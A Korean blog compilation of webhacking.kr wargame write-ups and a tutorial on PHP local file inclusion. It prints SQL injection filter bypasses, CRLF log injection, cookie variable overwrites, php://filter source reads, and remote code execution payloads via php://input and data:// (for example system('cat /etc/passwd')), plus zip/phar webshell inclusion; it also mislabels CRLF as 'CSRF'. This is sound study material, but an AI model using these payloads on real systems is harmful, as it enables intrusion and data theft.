적당히 값을 길게 하고 Forward를 하면 에러와 함께 upload_dir이 나타납니다. /4b0e87fef7b5e8ba83894970c9806042e5d6ec9a 디렉터리는 공용이기 때문에 새로운 파일을 올린 뒤 그 경로로 접속해도 되지만 다른 사람들이 올렸을만한 test 같은 경로로 접속해도 플래그를 얻을 수 있습니다.

접속하면 다음과 같이 플래그를 획득할 수 있습니다.

아무래도 난독화를 해놓은 거 같은데 어떻게 한 건지 몰라서 우리의 친구 Gemini에게 풀어달라고 해봤습니다. 그랬더니 AAEncode 라는 방식으로 인코딩을 한 결과라고 알려줬습니다. 디코딩할 수 있는 사이트가 있어 디코딩을 해줬더니 아래 코드가 나왓습니다.

var enco='';
var enco2=126;
var enco3=33;
var ck=document.URL.substr(document.URL.indexOf('='));
for(i=1;i<122;i++){
  enco=enco+String.fromCharCode(i,0);
}
function enco_(x){
  return enco.charCodeAt(x);
}
if(ck=="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3)){
  location.href="./"+ck.replace("=","")+".php";
};

ck값을 계산(제미나이가)하면 =youaregod~~~~~~~!이 나옵니다. https://webhacking.kr/challenge/code-3/youaregod~~~~~~~!.php 로 접속하면 문제를 해결할 수 있습니다.

vi 에디터를 사용하고 있었다는 내용이 가장 중요한 힌트입니다. vi 에디터에서는 비정상적으로 에디터가 종료되었을 때 백업을 위해 .swp 파일을 생성합니다.

실제로는 편집 시작 시 .파일명.swp 이라는 임시 파일을 생성했다가 정상 종료 시 삭제하는 동작을 수행합니다. 따라서 비정상적으로 종료되었다면 .파일명.swp이라는 파일이 존재합니다.

index.php의 백업 파일인 .index.php.swp으로 이동하면 스왑 파일이 다운로드되고, 파일에서 플래그를 얻을 수 있습니다.

b0VIM 8.0              섷  root                                    webhacking.kr                           /var/www/html/challenge/bonus-8/index.php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
U3210    #"! U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 tp
                  
       
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               ad  ?  ?            ?  ?  ?                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ??>   $flag = "FLAG{what_about_the_nano_editor?}"; <?php 

이 문제도 GET을 통해 파일 경로를 파라미터로 직접 받고 있습니다. flag.php 파일 안에 플래그가 존재한다고 했으니 php wrapper를 사용해 파일에 들어있는 플래그를 확인해 보겠습니다.

원본 소스 코드를 읽을 때 php://filter wrapper를 사용합니다. ?file= 이후에 php://filter/read=convert.base64-encode/resource=flag 를 넣으면 base64로 인코딩 된 소스 코드를 얻을 수 있습니다.

<?php
  echo "FLAG is in the code";
  $flag = "FLAG{this_is_your_first_flag}";
?>

디코딩을 한 결과는 다음과 같습니다.

LFI(Local File Inclusion) 취약점은 웹 애플리케이션이 사용자 입력값을 제대로 검증하지 않아, 공격자가 서버 내부의 민감한 파일을 읽어오거나 임의의 코드를 실행할 수 있게 되는 웹 보안 취약점입니다.

2. 동작 원리

기본 동작

정상적인 웹사이트가 파라미터를 통해 페이지를 불러온다고 가정해 보겠습니다.

• 정상적인 요청 : http://example.com/index.php?page=example.php (example.php 파일을 불러옴)

만약 웹 애플리케이션이 page에 들어오는 값을 아무런 검증 없이 그냥 사용한다면 경로 조작 문자(../)를 삽입하여 웹 루트 디렉터리를 벗어날 수 있습니다.

php wrapper와 결합

이러한 취약점이 php Wrapper와 결합되면 단순한 파일 읽기를 넘어, 필터링 우회나 원격 코드 실행 등 공격의 파급력이 극대화될 수 있습니다.

1. php://filter (소스 코드 유출 및 필터링 우회)

가장 널리 쓰이는 Wrapper입니다. 일반적으로 include() 함수로 PHP 파일을 불러오면 서버에서 해당 코드가 실행된 결과만 화면에 출력됩니다. 하지만 공격자가 웹 애플리케이션 설정 파일 등의 '원본 소스 코드'를 읽고 싶을 때 php://filter를 사용합니다.

• 공격 원리: 서버의 파일을 읽어올 때 Base64 등의 인코딩 필터를 적용하여 읽어옵니다. 코드가 인코딩된 문자열로 반환되기 때문에 PHP 엔진이 이를 코드로 인식하지 않고 단순 문자열로 취급하여 실행하지 않을 채 화면에 그대로 출력하게 됩니다. 공격자는 출력된 Base64 값을 디코딩하여 원본 소스 코드를 획득합니다.
• 공격 예시: http://example.com/index.php?page=php://filter/read=convert.base64-encode/resource=example.php

2. php://input (원격 코드 실행 - RCE) HTTP 요청의 Body 데이터를 직접 읽어올 수 있는 Wrapper입니다. 이 방법은 서버의 php.ini 설정에서 allow_url_include 옵션이 On으로 설정되어 있으면 가능합니다.

• 공격 원리: URL 파라미터에는 php://input을 지정하고, HTTP POST 요청의 본문 영역에 악성 PHP 코드를 삽입하여 전송합니다. 서버는 POST로 전달된 악성 코드를 마치 로컬 파일의 내용인 것처럼 인식하고 include()하여 실행하게 됩니다.
• 공격 예시
  • URL: http://example.com/index.php?lage=php://input
  • body: <?php system('cat /etc/passwd'); ?>

예시에서는 cat /etc/passwd를 사용했으나 웹쉘을 실행시켜 관리자 권한을 획득할 수도 있습니다.

3. data:// (원격 코드 실행 - RCE) php://input과 동일하게 원격 코드 실행을 수행할 수 있습니다. 이 역시 allow_url_include 옵션이 On이어야 동작합니다.

• 공격 원리: 별도의 파일을 서버에 업로드할 필요 없이 URL 파라미터 내에 평문이나 Base64로 인코딩된 악성 코드를 직접 주입하여 실행시킵니다.
• 공격 예시: <?php system('id'); ?>코드를 Base64로 인코딩하여 삽입 http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

평문이 아닌 Base64로 인코딩해서 전송하는 이유는 WAF 우회 목적도 존재합니다. 하지만 주된 이유는 URL 문법 충돌 방지 및 안전한 전송을 위해서입니다. 특수 문자들을 URL 파라미터에 그대로 넣게 되면 유실되거나 잘못 해석될 수 있어 에러를 일으킬 수 있기 때문입니다.

그럼 앞에서 본 php://input과 data://를 둘 다 알아야 하는 이유가 있을까요? 둘 다 allow_url_include = On이 되어 있어야 한다는 공통된 전제 조건이 필요합니다. 하지만 악성 데이터를 서버로 전달하는 방식(HTTP Body vs URL)이 다르기 때문에 POST Body와 URL의 보안 설정에 따라 각 방식의 성공 여부가 갈리게 됩니다.

따라서 php.ini에서 allow_url_include가 On으로 설정되어 있으면 php://input과 data:// 두 가지 Wrapper를 다 사용해보는 것이 좋은 접근 방식입니다.

4. zip:// 및 phar:// (압축 파일을 이용한 실행) 공격자가 서버에 이미지 파일(.jpg) 등으로 위장한 압축 파일(.zip)을 업로드할 수 있는 환경에서 사용됩니다.

• 공격 원리: 악성 PHP 코드가 담긴 파일을 압축한 뒤, 확장자를 허용하는 이미지 포맷으로 변경하여 서버에 업로드합니다. 이후 LFI 취약점을 통해 zip:// 또는 phar:// Wrapper를 사용하여 해당 파일 내부의 악성 코드를 직접 지정해 실행시킵니다. 앞의 php://input이나 data:// 방식과는 다르게 allow_url_include가 Off 상태에서도 동작할 수 있어 매우 위협적입니다.
• 공격 예시: http://example.com/index.php?page=zip://uploads/image.jpg#shell.php

두 방식의 차이점을 간단히 보면 아래와 같습니다.

단순히 차이점만 보면 phar://을 두고 zip://을 쓸 이유가 전혀 없어보입니다. 하지만 필터링 로직이나 보안 설정 과정에서 zip://만 통과가 되는 경우가 존재할 수 있기 때문에 phar://으로 먼저 시도를 해본 뒤 안된다면 zip://으로도 시도를 해보는 것이 좋은 방법이라고 생각됩니다.

앞 게시글인 php wrapper에 이어 LFI 취약점과 두 방식을 결합한 취약점에 대해서 알아봤습니다. 이제 이 방식을 이용한 워게임 풀이(webhacking.kr old-25)를 다음 포스트에서 해보겠습니다.

php wrapper

php에서 래퍼(Wrapper)란, 다양한 종류의 데이터 소스(파일, 압축 파일, 웹 주소 등)를 다룰 때 일관된 방법으로 접근할 수 있도록 감싸주는 인터페이스 또는 핸들러를 의미합니다.

wrapper의 역할

PHP에는 파일을 읽거나 쓸 때 사용하는 fopen(), include() 같은 함수들이 있습니다. 원래 이 함수들은 서버(로컬)에 있는 일반적인 파일을 다루기 위해 만들어 졌습니다.

하지만 개발을 하다 보면 인터넷에 있는 다른 웹 페이지의 내용, 혹은 메모리상의 데이터를 읽어오고 싶을 때가 있습니다. 이때 데이터 소스마다 복잡하게 다른 함수를 새로 만드는 대신, 앞에 특정 프로토콜을 붙여주면, 그 규칙에 맞는 '래퍼'가 알아서 데이터를 가져와 일반 파일처럼 읽을 수 있게 만들어 주는 시스템이 스트림 래퍼(Stream Wrapper) 입니다.

대표적인 php 내장 wrapper

자세한 내용은 php 공식 웹사이트에서 확인하실 수 있습니다. (https://www.php.net/manual/en/wrappers.php)

실제 사용 예시

1. php://input (REST API 맟 웹훅 데이터 수신)

가장 실무에서 빈번하게 쓰이는 형태입니다. 클라이언트(Vue, React 등 프론트엔드)나 외부 결제 서비스(웹훅)가 application/json 형태로 데이터를 POST 전송할 때, PHP의 기본 $_POST 배열로는 이 데이터를 읽을 수 없습니다. 이때 가공되지 않은 순수 요청 본문(Raw Body)을 읽어오기 위해 사용합니다.

// 외부에서 전송된 JSON 데이터를 읽어서 배열로 변환
$rawData = file_get_contents('php://input');
$requestData = json_decode($rawData, true);

echo "요청받은 사용자 ID: " . $requestData['user_id'];

2. php://output (대용량 CSV 파일 실시간 생성 및 다운로드)

서버의 하드 디스크에 파일을 굳이 저장하지 않고, 메모리상에서 생성한 데이터를 사용자의 브라우저로 즉시 스트리밍(다운로드)할 때 사용합니다. 서버의 디스크 용량을 절약하고 처리 속도를 크게 높일 수 있습니다.

header('Content-Type: text/csv; charset=utf-8');
header('Content-Disposition: attachment; filename="report.csv"');

// 디스크가 아닌 브라우저 출력 스트림을 직접 엽니다.
$output = fopen('php://output', 'w');

// 데이터를 출력 스트림에 직접 씁니다 (바로 다운로드 됨)
fputcsv($output, ['이름', '이메일', '가입일']);
fputcsv($output, ['홍길동', 'hong@test.com', '2026-03-31']);

fclose($output);

3. phar:// (애플리케이션 패키징 및 배포)

수십, 수백 개의 PHP 파일로 이루어진 라이브러리나 프로그램을 하나의 실행 가능한 .phar (PHP Archive) 파일로 묶어서 배포할 때 씁니다.

// phar 파일 압축을 풀지 않고도 내부의 설정 파일을 바로 읽음
$config = include 'phar://my-app.phar/config/database.php';

TCP Wrapper를 이용한 LFI 취약점은 다음 포스트에서 이어서 정리해 보겠습니다!

<html>
<head>
<title>Challenge 38</title>
</head>
<body>
<h1>LOG INJECTION</h1>
<form method=post action=index.php>
<input type=text name=id size=20>
<input type=submit value='Login'>
</form>
<!-- <a href=admin.php>admin page</a> -->
</body>
</html>

html 코드를 확인해 보면 admin.php로 이동할 수 있는 admin page라는 하이퍼링크가 주석 처리 되어있는 걸 확인할 수 있습니다.

만약 주석이 없어도 Gobuster(https://velog.io/@jinwoo_kim/Gobuster-%EC%95%8C%EC%95%84%EB%B3%B4%EA%B8%B0) 라는 도구를 통해 위 사진처럼 admin.php를 찾을 수 있습니다.

이제 admin.php로 접속을 해보겠습니다. 접속을 하면 You must logged as "admin" 이라는 문구가 나옵니다. index.php로 돌아가서 login 창에 admin을 입력하면 you are not admin이라는 문구가 나옵니다.

admin.php의 이름이 log viewer이므로 일단 다른 이름으로 로그인을 한 후 다시 확인해 보겠습니다. guest로 로그인을 한 후 다시 접속해보면 아래 사진처럼 로그가 나오게 됩니다. 그렇다면 로그에 IP:admin 이라는 로그가 존재하면 사용자를 로그인으로 인식할 수도 있을 거 같습니다. 하지만 input type이 text인 경우 한 줄만 입력받기 때문에 개행 문자가 삽입되지 않습니다. 따라서 input을 textarea로 변경한 후 줄을 띄워서 새로운 로그를 입력하면 해결할 수 있습니다.

guest
Your IP:admin

사진처럼 textarea로 변경한 뒤 값을 입력해주면 풀리게 됩니다.

textarea 말고 burp suite를 이용하여 POST 패킷을 직접 수정해 조작하는 방법도 있습니다. burp suite를 실행한 뒤 proxy > Open browser를 눌러 패킷을 가로챌 브라우저를 실행합니다.

문제에 접속한 뒤 사진처럼 Intercept를 on으로 바꾸고 로그인 버튼을 눌러보겠습니다.

그럼 사진과 같이 패킷이 잡히고 Request 탭에서 패킷을 수정할 수가 있습니다. 아래의 id=aa 부분에 %0d%0aYourIP:admin 을 추가하면 동일하게 풀 수 있습니다. 여기서 %0d%0a는 CSRF(개행 문자)입니다.

<?php
  if($_GET['no']){
  $db = dbconnect();
  if(preg_match("/#|select|\(| |limit|=|0x/i",$_GET['no'])) exit("no hack");
  $r=mysqli_fetch_array(mysqli_query($db,"select id from chall27 where id='guest' and no=({$_GET['no']})")) or die("query error");
  if($r['id']=="guest") echo("guest");
  if($r['id']=="admin") solve(27); // admin's no = 2
}
?>

조건은 r[id] 값을 admin으로 설정하는 것입니다. preg_match를 통해 #, select, , limit, =, 0x를 필터링하고 있습니다. 그리고 no= 뒤에 ()로 묶여있기 때문에 괄호 안에 그냥 구문을 입력하면 참인 경우 앞의 id='guest'에 의해 guest가 반환되게 됩니다.

따라서 닫는 괄호를 통해 no=(0) 이런 식으로 닫은 후 기존에 존재하던 뒤의 괄호는 주석 처리를 하여 해결할 수 있을 것 같습니다. 쿼리문을 작성해 보면 0) or id=admin -- 으로 문제를 풀 수 있습니다.

이제 preg_match를 우회하기 위해 공백과 =를 대체해주면 됩니다. 공백은 %09(탭), 등호는 like 구문으로 대체해주면 최종 결과는 0)%09or%09id%09like%09'admin'%09--%09 가 됩니다.

이걸 입력 폼에 넣으면 %09를 특수 문자가 아닌 그냥 문자열로 인식하기 때문에 url의 ?no=를 통해 전달해주면 됩니다.

<?php
  $db = dbconnect();
  if($_POST['id']){
    $_POST['id'] = str_replace("\\","",$_POST['id']);
    $_POST['id'] = str_replace("'","''",$_POST['id']);
    $_POST['id'] = substr($_POST['id'],0,15);
    $result = mysqli_fetch_array(mysqli_query($db,"select 1 from member where length(id)<14 and id='{$_POST['id']}"));
    if($result[0] == 1){
      solve(39);
    }
  }
?>

최종 목표는 $result[0]의 값을 1로 만드는 것입니다. select 1구문이 존재하므로 쿼리문 조건에 맞는 데이터가 존재할 경우 1을 반환합니다. 따라서 목표는 조건에 맞는 데이터가 존재하도록 쿼리문을 작성하는 것이 됩니다.

코드를 살펴보면 id를 POST 전송으로 전달을 받은 후, \는 공백으로 처리하고 '는 ''으로 변환한 뒤 앞에서부터 15자가 되도록 자릅니다.

'가 ''으로 변환이 되기 때문에 id=' 이후 '을 통해 입력 문자열을 닫고 or 구문을 사용하는 것이 불가능해 보입니다. 쿼리문이 정상적으로 동작하기 위해서는 ' 하나가 반드시 필요하기 때문에 substr을 통해 '' 중 뒤에 있는 따옴표를 제거할 수 있어 보입니다.

id가 실제 존재하는 id여야 1을 반환하기 때문에 가장 있을만한 admin이라는 id를 사용하겠습니다. substr 길이에 맞춰 입력 값을 사진처럼 넣으면 맨 끝의 '' 중 뒤의 따옴표가 substr에 의해 잘리므로 입력 값과 동일한 값만 남게 됩니다.

이렇게 넣으면 length(id)<14를 만족하지 않는 거 아닌가? 라고 생각할 수도 있지만 length(id)는 id의 길이가 아닌 member 테이블에 저장되어 있는 id 컬럼 값의 길이이므로 조건을 만족합니다.

view source 링크가 있으므로 코드를 확인해 보겠습니다.

<?php
  extract($_SERVER);
  extract($_COOKIE);
  $ip = $REMOTE_ADDR;
  $agent = $HTTP_USER_AGENT;
  if($REMOTE_ADDR){
    $ip = htmlspecialchars($REMOTE_ADDR);
    $ip = str_replace("..",".",$ip);
    $ip = str_replace("12","",$ip);
    $ip = str_replace("7.","",$ip);
    $ip = str_replace("0.","",$ip);
  }
  if($HTTP_USER_AGENT){
    $agent=htmlspecialchars($HTTP_USER_AGENT);
  }
  echo "<table border=1><tr><td>client ip</td><td>{$ip}</td></tr><tr><td>agent</td><td>{$agent}</td></tr></table>";
  if($ip=="127.0.0.1"){
    solve(24);
    exit();
  }
  else{
    echo "<hr><center>Wrong IP!</center>";
  }
?>

cookie와 server에서 extract 함수를 통해 변수를 생성합니다. 서버에서 REMOTE_ADDR과 HTTP_USER_AGENT 값을 받아옵니다. 여기서 extract($_COOKIE) 가 뒤에 위치하므로 이름이 REMOTE_ADDR이나 HTTP_USER_AGENT 라는 쿠키를 만들면 값을 변경할 수 있습니다. 사진처럼 쿠키를 통해 값을 변경할 수 있습니다.

문제에서 ip가 127.0.0.1이면 solve를 실행하므로 REMOTE_ADDR 쿠키를 통해 값을 변경하여 해결할 수 있습니다.

하지만 if($REMOTE_ADDR)에서 필터링이 있기 때문에 이를 우회하여 값을 넣어야 합니다. 조건은 ..을 .으로 바꾸고, 12, 7., 0.은 없애버립니다.

우회하는 값은 112277...00...00...1 등이 있습니다.